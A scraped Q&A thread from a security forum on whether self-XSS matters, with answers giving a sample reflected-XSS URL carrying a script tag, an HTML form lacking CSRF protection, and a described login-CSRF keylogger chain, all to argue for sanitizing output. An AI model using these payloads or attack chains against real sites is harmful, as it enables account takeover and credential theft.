              Although you are right in that it might not matter so much from an attack point of view. From a usability point of view, the user might come across some 'unexpected behavior'. A while ago I used to have to work with software that had an obvious SQL injection problem (contractors couldn't/wouldn't fix it). This meant that unexpecting users would enter in something seemingly harmless such as their name "O'Brien", which would trigger an SQL injection and for computer illiterate people it was unexpected behavior, that was extremely difficult for them to troubleshoot. It is probably less likely with XSS, however consider the following if a user uses <> instead of () the data might seem to disappear. A proof of concept is below:



              <html>
              <head><title>HI</title></head>
              <body>
              <h1>WEBSITE</h1>
              Hey my name is <travis>.
              </body>
              </html>


              Note that when this website is rendered, the word 'travis', is not rendered.







              share|improve this answer














              share|improve this answer



              share|improve this answer








              edited Apr 3 at 21:08

























              answered Apr 1 at 20:51









              meowcatmeowcat

              699111




              699111







              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18












              • 1





                This is the real issue

                – DreamConspiracy
                Apr 2 at 7:03






              • 19





                They're both real issues.

                – Lightness Races in Orbit
                Apr 2 at 12:34






              • 28





                Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

                – SeldomNeedy
                Apr 2 at 22:01







              • 6





                Poor little Bobby Tables

                – Wayne Werner
                Apr 3 at 11:31






              • 4





                @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

                – meowcat
                Apr 3 at 21:18







              1




              1





              This is the real issue

              – DreamConspiracy
              Apr 2 at 7:03





              This is the real issue

              – DreamConspiracy
              Apr 2 at 7:03




              19




              19





              They're both real issues.

              – Lightness Races in Orbit
              Apr 2 at 12:34





              They're both real issues.

              – Lightness Races in Orbit
              Apr 2 at 12:34




              28




              28





              Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

              – SeldomNeedy
              Apr 2 at 22:01






              Being able to break an application by putting strange symbols into input-fields is unexpected behavior regardless of the user's computer-literacy; plenty of programmers named O'Brien probably expect that their name isn't some kind of impossible problem for a decent site to handle.

              – SeldomNeedy
              Apr 2 at 22:01





              6




              6





              Poor little Bobby Tables

              – Wayne Werner
              Apr 3 at 11:31





              Poor little Bobby Tables

              – Wayne Werner
              Apr 3 at 11:31




              4




              4





              @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

              – meowcat
              Apr 3 at 21:18





              @WayneWerner lol yes, the contractors reasoning for not fixing the issue was because only trusted people could use the application, and they had logs of who did what on the system, so thy would know who SQL injected them... even though the logs where stored in the database... sigh.

              – meowcat
              Apr 3 at 21:18











              16














              If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



              But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



              Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



              https://www.example.com/search?data=<script src="..."></script>


              Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



              <form method="post" action="submit">
              <input type="text" name="title">
              <input type="text" name="note">
              <input type="submit" value="submit">
              <!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
              </form>


              As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.






              share|improve this answer



























                16














                If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



                But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



                Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



                https://www.example.com/search?data=<script src="..."></script>


                Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



                <form method="post" action="submit">
                <input type="text" name="title">
                <input type="text" name="note">
                <input type="submit" value="submit">
                <!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
                </form>


                As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.






                share|improve this answer

























                  16












                  16








                  16







                  If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



                  But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



                  Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



                  https://www.example.com/search?data=<script src="..."></script>


                  Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



                  <form method="post" action="submit">
                  <input type="text" name="title">
                  <input type="text" name="note">
                  <input type="submit" value="submit">
                  <!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
                  </form>


                  As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.






                  share|improve this answer













                  If the only way to insert malicious code is to literally type it on your webpage, then the attack vector would be "self xss", which was mentioned in another answer, and which is a social engineering attack you can't really prevent.



                  But if malicious code can also be loaded in other ways on your page, then you have a bigger problem. For example, if your website is vulnerable to reflected XSS or CSRF, an attacker can use those to make the user load malicious code.



                  Example of reflected XSS: if the data parameter is printed on the page without sanitizing it, an attacker can make the victim browse to the following URL to make them load malicious code.



                  https://www.example.com/search?data=<script src="..."></script>


                  Example of CSRF: if the submitted data is then printed on the page without sanitizing it and there's also no protection against CSRF, an attacker can make the victim post malicious data.



                  <form method="post" action="submit">
                  <input type="text" name="title">
                  <input type="text" name="note">
                  <input type="submit" value="submit">
                  <!-- NO TOKEN TO PREVENT CSRF HERE!!! -->
                  </form>


                  As you can see the problem is not only "who can see the data", but also "who can enter the data". But even if you were sure that the above examples don't apply to your situation, why should you still try to avoid XSS and always try to sanitize the data? Because sanitization should become a habit even if in some situations it might not seem really useful. If sanitization is not a habit, sooner or later you will forget to sanitize something that eventually leads to XSS.







                  share|improve this answer












                  share|improve this answer



                  share|improve this answer










                  answered Apr 2 at 10:44









                  reedreed

                  3,1343926




                  3,1343926





















                      11














                      XSS is still bad, even if it the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



                      Here's an example of an attack: First, I need to get the victim to login as me. This can done through social engineering or login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to login as themself, I get sent their password.



                      There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.






                      share|improve this answer


















                      • 1





                        I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                        – Carl Leth
                        Apr 4 at 8:21















                      11














                      XSS is still bad, even if it the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



                      Here's an example of an attack: First, I need to get the victim to login as me. This can done through social engineering or login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to login as themself, I get sent their password.



                      There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.






                      share|improve this answer


















                      • 1





                        I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                        – Carl Leth
                        Apr 4 at 8:21













                      11












                      11








                      11







                      XSS is still bad, even if it the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



                      Here's an example of an attack: First, I need to get the victim to login as me. This can done through social engineering or login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to login as themself, I get sent their password.



                      There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.






                      share|improve this answer













                      XSS is still bad, even if it the payload is tied to the account that created it. Sure, it's not as bad as "ordinary" XSS, but it's still not harmless.



                      Here's an example of an attack: First, I need to get the victim to login as me. This can done through social engineering or login CSRF if there is no protection against that. Second, I have the victim visit the affected page logged in as me. The script then adds a keylogger to the site, so when the victim logs out and tries to login as themself, I get sent their password.



                      There are many reasons an attack like this would fail, but it might just work. You should plug any and all XSS holes, no matter where they are.







                      share|improve this answer












                      share|improve this answer



                      share|improve this answer










                      answered Apr 2 at 11:59









                      AndersAnders

                      50.5k22144167




                      50.5k22144167







                      • 1





                        I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                        – Carl Leth
                        Apr 4 at 8:21












                      • 1





                        I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                        – Carl Leth
                        Apr 4 at 8:21







                      1




                      1





                      I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                      – Carl Leth
                      Apr 4 at 8:21





                      I like this answer because someone offering "oh just log in as me and fix it real quick" is a very counter-intuitive way for them to attack you. I can imagine this working on even security-conscious people and it nicely addresses OP's constraints.

                      – Carl Leth
                      Apr 4 at 8:21











                      5














                      I think there is another use case that may not be listed in the answers so far which is the accidental self XSS. Some users may run into an issue that they encounter on a site and may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



                      The scope of the attack is for the user to accidentally self-harm, but would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer linux help, but subtely include some command that might exfiltrate user data in some way.






                      share|improve this answer



























                        5














                        I think there is another use case that may not be listed in the answers so far which is the accidental self XSS. Some users may run into an issue that they encounter on a site and may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



                        The scope of the attack is for the user to accidentally self-harm, but would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer linux help, but subtely include some command that might exfiltrate user data in some way.






                        share|improve this answer

























                          5












                          5








                          5







                          I think there is another use case that may not be listed in the answers so far which is the accidental self XSS. Some users may run into an issue that they encounter on a site and may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



                          The scope of the attack is for the user to accidentally self-harm, but would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer linux help, but subtely include some command that might exfiltrate user data in some way.






                          share|improve this answer













                          I think there is another use case that may not be listed in the answers so far which is the accidental self XSS. Some users may run into an issue that they encounter on a site and may start googling for drop-in solutions that they copy and paste. Carefully crafted "solutions" could cause trouble.



                          The scope of the attack is for the user to accidentally self-harm, but would be unlikely to harm other users. This is similar to how it can be dangerous to copy and paste bash commands that you find on the internet. A malicious site might offer linux help, but subtely include some command that might exfiltrate user data in some way.







                          share|improve this answer












                          share|improve this answer



                          share|improve this answer










                          answered Apr 2 at 11:44









                          zero298zero298

                          21219




                          21219





















                              4














                              Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



                              As an example, I recently saw an issue where a text field would, according the the bug report, remove all text after a Less-Than Sign. The browser was interpreting the Less-Than Sign as the start of an HTML tag.



                              Another issue that I've seen is that such "self-XSS" fields do not allow any arbitrary valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



                              One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


                              If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.






                              share|improve this answer





























                                4














                                Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



                                As an example, I recently saw an issue where a text field would, according the the bug report, remove all text after a Less-Than Sign. The browser was interpreting the Less-Than Sign as the start of an HTML tag.



                                Another issue that I've seen is that such "self-XSS" fields do not allow any arbitrary valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



                                One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


                                If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.






                                share|improve this answer



























                                  4












                                  4








                                  4







                                  Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



                                  As an example, I recently saw an issue where a text field would, according the the bug report, remove all text after a Less-Than Sign. The browser was interpreting the Less-Than Sign as the start of an HTML tag.



                                  Another issue that I've seen is that such "self-XSS" fields do not allow any arbitrary valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



                                  One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


                                  If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.






                                  share|improve this answer















                                  Allowing ostensibly "self-XSS" attacks may have secondary ramifications.



                                  As an example, I recently saw an issue where a text field would, according the the bug report, remove all text after a Less-Than Sign. The browser was interpreting the Less-Than Sign as the start of an HTML tag.



                                  Another issue that I've seen is that such "self-XSS" fields do not allow any arbitrary valid input. For instance, consider a "notes" field, in which the user may wish to store something that they learned:



                                  One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>


                                  If your application allows "self-XSS" attacks, then the user will have difficulty adding such a note.







                                  share|improve this answer














                                  share|improve this answer



                                  share|improve this answer








                                  edited Apr 3 at 15:34

























                                  answered Apr 2 at 14:04









                                  dotancohendotancohen

                                  2,47231933




                                  2,47231933





















                                      1














                                      Something not mentioned in other answers, is the potential secondary security issues that can arise from a self-XSS.



                                      Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password, or allowing a third-party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, idle session (user away from their desk), or a cross-site-request-forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions because they wouldn't know the users password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the users credentials or setup an XSS payload to give them persistent access to the user's account (every time the user logs in).



                                      In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies, or browser session. I've actually used this attack chain technique several times when demonstrating vulnerabilities to developers.






                                      share|improve this answer





























                                        1














                                        Something not mentioned in other answers, is the potential secondary security issues that can arise from a self-XSS.



                                        Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password, or allowing a third-party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, idle session (user away from their desk), or a cross-site-request-forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions because they wouldn't know the users password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the users credentials or setup an XSS payload to give them persistent access to the user's account (every time the user logs in).



                                        In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies, or browser session. I've actually used this attack chain technique several times when demonstrating vulnerabilities to developers.






                                        share|improve this answer



























                                          1












                                          1








                                          1







                                          Something not mentioned in other answers, is the potential secondary security issues that can arise from a self-XSS.



                                          Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password, or allowing a third-party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, idle session (user away from their desk), or a cross-site-request-forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions because they wouldn't know the users password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the users credentials or setup an XSS payload to give them persistent access to the user's account (every time the user logs in).



                                          In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies, or browser session. I've actually used this attack chain technique several times when demonstrating vulnerabilities to developers.






                                          share|improve this answer















                                          Something not mentioned in other answers, is the potential secondary security issues that can arise from a self-XSS.



                                          Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password, or allowing a third-party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, idle session (user away from their desk), or a cross-site-request-forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions because they wouldn't know the users password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the users credentials or setup an XSS payload to give them persistent access to the user's account (every time the user logs in).



                                          In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies, or browser session. I've actually used this attack chain technique several times when demonstrating vulnerabilities to developers.







                                          share|improve this answer














                                          share|improve this answer



                                          share|improve this answer








                                          edited Apr 4 at 13:47

























                                          answered Apr 3 at 17:20









                                          shellstershellster

                                          52734




                                          52734





















                                              1














                                              There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top one related to that didn't explicitly make the connection it implies.



                                              Being, essentially, that if people can get tricked into dropping self-XSS code into the dev console, why would you expect them not to not get tricked into dropping into some input element in your UI?



                                              Some other answers tie that together into how this can create broader issues when it (imo, inevitably, if someone gets tricked into self-XSSing) leads to account compromises.



                                              I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



                                              Development Practices: Implications of Allowing Self-XSS




                                              Let's say a user can store some data in a web app. I'm now only
                                              talking about that sort of data the user can THEMSELVES view, not that
                                              is intended to be viewed by other users of the webapp.




                                              The problem with your supposition here is that it assumes that you don't prevent XSS on all output of user provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select the different output filtering method.



                                              If you don't have your application coded in such a way that the default method of output prevents XSS (and different output targets such as attributes versus elements require different methodologies for what is and isn't allowed, hence 'default'), and it requires more effort (not less) to target output to allow (hopefully whitelisted, "purified") something to go through as native HTML/etc...



                                              How sure are you that you aren't going to have an accident where some reflection of user data back to the web doesn't allow XSS outside of just "data the user can THEMSELVES view"?



                                              Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



                                              Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer in relation to each place this might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not being written like this, where it prevents XSS by default and requires an override parameter of some kind to disable this output purifying, then it's a sign that you need to re-evaluate your process.






                                              share|improve this answer



























                                                1














                                                There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top one related to that didn't explicitly make the connection it implies.



                                                Being, essentially, that if people can get tricked into dropping self-XSS code into the dev console, why would you expect them not to not get tricked into dropping into some input element in your UI?



                                                Some other answers tie that together into how this can create broader issues when it (imo, inevitably, if someone gets tricked into self-XSSing) leads to account compromises.



                                                I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



                                                Development Practices: Implications of Allowing Self-XSS




                                                Let's say a user can store some data in a web app. I'm now only
                                                talking about that sort of data the user can THEMSELVES view, not that
                                                is intended to be viewed by other users of the webapp.




                                                The problem with your supposition here is that it assumes that you don't prevent XSS on all output of user provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select the different output filtering method.



                                                If you don't have your application coded in such a way that the default method of output prevents XSS (and different output targets such as attributes versus elements require different methodologies for what is and isn't allowed, hence 'default'), and it requires more effort (not less) to target output to allow (hopefully whitelisted, "purified") something to go through as native HTML/etc...



                                                How sure are you that you aren't going to have an accident where some reflection of user data back to the web doesn't allow XSS outside of just "data the user can THEMSELVES view"?



                                                Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



                                                Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer in relation to each place this might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not being written like this, where it prevents XSS by default and requires an override parameter of some kind to disable this output purifying, then it's a sign that you need to re-evaluate your process.






                                                share|improve this answer

























                                                  1












                                                  1








                                                  1







                                                  There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top one related to that didn't explicitly make the connection it implies.



                                                  Being, essentially, that if people can get tricked into dropping self-XSS code into the dev console, why would you expect them not to not get tricked into dropping into some input element in your UI?



                                                  Some other answers tie that together into how this can create broader issues when it (imo, inevitably, if someone gets tricked into self-XSSing) leads to account compromises.



                                                  I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



                                                  Development Practices: Implications of Allowing Self-XSS




                                                  Let's say a user can store some data in a web app. I'm now only
                                                  talking about that sort of data the user can THEMSELVES view, not that
                                                  is intended to be viewed by other users of the webapp.




                                                  The problem with your supposition here is that it assumes that you don't prevent XSS on all output of user provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select the different output filtering method.



                                                  If you don't have your application coded in such a way that the default method of output prevents XSS (and different output targets such as attributes versus elements require different methodologies for what is and isn't allowed, hence 'default'), and it requires more effort (not less) to target output to allow (hopefully whitelisted, "purified") something to go through as native HTML/etc...



                                                  How sure are you that you aren't going to have an accident where some reflection of user data back to the web doesn't allow XSS outside of just "data the user can THEMSELVES view"?



                                                  Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



                                                  Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer in relation to each place this might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not being written like this, where it prevents XSS by default and requires an override parameter of some kind to disable this output purifying, then it's a sign that you need to re-evaluate your process.






                                                  share|improve this answer













                                                  There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top one related to that didn't explicitly make the connection it implies.



                                                  Being, essentially, that if people can get tricked into dropping self-XSS code into the dev console, why would you expect them not to not get tricked into dropping into some input element in your UI?



                                                  Some other answers tie that together into how this can create broader issues when it (imo, inevitably, if someone gets tricked into self-XSSing) leads to account compromises.



                                                  I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:



                                                  Development Practices: Implications of Allowing Self-XSS




                                                  Let's say a user can store some data in a web app. I'm now only
                                                  talking about that sort of data the user can THEMSELVES view, not that
                                                  is intended to be viewed by other users of the webapp.




                                                  The problem with your supposition here is that it assumes that you don't prevent XSS on all output of user provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select the different output filtering method.



                                                  If you don't have your application coded in such a way that the default method of output prevents XSS (and different output targets such as attributes versus elements require different methodologies for what is and isn't allowed, hence 'default'), and it requires more effort (not less) to target output to allow (hopefully whitelisted, "purified") something to go through as native HTML/etc...



                                                  How sure are you that you aren't going to have an accident where some reflection of user data back to the web doesn't allow XSS outside of just "data the user can THEMSELVES view"?



                                                  Because mistakes happen. People forget steps when writing code. Failures occur in training where key points or even topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe outcome.



                                                  Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer in relation to each place this might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not being written like this, where it prevents XSS by default and requires an override parameter of some kind to disable this output purifying, then it's a sign that you need to re-evaluate your process.







                                                  share|improve this answer












                                                  share|improve this answer



                                                  share|improve this answer










                                                  answered Apr 4 at 19:50









                                                  taswyntaswyn

                                                  21816




                                                  21816





















                                                      0














                                                      Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing as a business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel/react when running into it?



                                                      Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not to worry about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent, ..?






                                                      share|improve this answer



























                                                        0














                                                        Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing as a business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel/react when running into it?



                                                        Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not to worry about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent, ..?






                                                        share|improve this answer

























                                                          0












                                                          0








                                                          0







                                                          Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing as a business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel/react when running into it?



                                                          Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not to worry about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent, ..?






                                                          share|improve this answer













                                                          Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing as a business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel/react when running into it?



                                                          Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not to worry about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent, ..?







                                                          share|improve this answer












                                                          share|improve this answer



                                                          share|improve this answer










                                                          answered Apr 4 at 8:48









                                                          n0idean0idea

                                                          1286




                                                          1286



























                                                              draft saved

                                                              draft discarded
















































                                                              Thanks for contributing an answer to Information Security Stack Exchange!


                                                              • Please be sure to answer the question. Provide details and share your research!

                                                              But avoid


                                                              • Asking for help, clarification, or responding to other answers.

                                                              • Making statements based on opinion; back them up with references or personal experience.

                                                              To learn more, see our tips on writing great answers.




                                                              draft saved


                                                              draft discarded














                                                              StackExchange.ready(
                                                              function ()
                                                              StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206579%2fhow-hard-should-i-try-to-prevent-a-user-from-xssing-themselves%23new-answer', 'question_page');

                                                              );

                                                              Post as a guest















                                                              Required, but never shown





















































                                                              Required, but never shown














                                                              Required, but never shown












                                                              Required, but never shown







                                                              Required, but never shown

































                                                              Required, but never shown














                                                              Required, but never shown












                                                              Required, but never shown







                                                              Required, but never shown







                                                              Popular posts from this blog

                                                              Adding axes to figuresAdding axes labels to LaTeX figuresLaTeX equivalent of ConTeXt buffersRotate a node but not its content: the case of the ellipse decorationHow to define the default vertical distance between nodes?TikZ scaling graphic and adjust node position and keep font sizeNumerical conditional within tikz keys?adding axes to shapesAlign axes across subfiguresAdding figures with a certain orderLine up nested tikz enviroments or how to get rid of themAdding axes labels to LaTeX figures

                                                              Tähtien Talli Jäsenet | Lähteet | NavigointivalikkoSuomen Hippos – Tähtien Talli

                                                              Do these cracks on my tires look bad? The Next CEO of Stack OverflowDry rot tire should I replace?Having to replace tiresFishtailed so easily? Bad tires? ABS?Filling the tires with something other than air, to avoid puncture hassles?Used Michelin tires safe to install?Do these tyre cracks necessitate replacement?Rumbling noise: tires or mechanicalIs it possible to fix noisy feathered tires?Are bad winter tires still better than summer tires in winter?Torque converter failure - Related to replacing only 2 tires?Why use snow tires on all 4 wheels on 2-wheel-drive cars?